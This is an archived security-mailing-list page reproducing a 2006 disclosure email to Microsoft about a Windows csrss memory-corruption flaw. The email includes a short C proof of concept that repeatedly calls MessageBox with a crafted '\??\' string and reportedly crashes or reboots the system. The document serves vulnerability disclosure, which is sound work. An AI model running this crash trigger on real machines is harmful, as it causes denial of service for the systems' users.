Информационная безопасность
[RU] switch to
English Version

  

Дополнительная информация

  Повреждение памяти в Microsoft Windows (memory corruption)

  EEYE: Windows Vista CSRSS Dangling Process Pointer Privilege Escalation

  Microsoft Security Bulletin MS07-021 Vulnerabilities in CSRSS Could Allow Remote Code Execution (930178)

  csrss.exe double-free vulnerability - arbitrary DWORD overwrite exploit

  ms ;)

From:3APA3A <3APA3A_(at)_security.nnov.ru>
Date:16 декабря 2006 г.
Subject:Microsoft Windows csrss (?) memory corruption exploited in-the-wild

Dear Secure@microsoft.com,

 On  one  of  Russian  forum  security  vulnerability  is  discussed in
 Microsoft Windows (Windows XP is tested). A vulnerability is caused by
 memory  corruption  is  string  beginning  with  "\?\" is send thorugh
 MessageBox  API  with MB_SERVICE_NOTIFICATION flag. It looks like some
 "debug"  feature  not  cleaned  out  in  final release and it seems to
 exploitable to code execution at kernel level. Code example below:


#include <stdio.h>
#include <windows.h>

int main(void){
int i;
char bug1 [] ="\\??\\XXXX";
for(i = 0; i < 10; i ++)
{
 MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
}
}

System hangs, crashes (BSOD) or reboots.
 

--
http://www.security.nnov.ru
        /\_/\
       { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                   |/

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru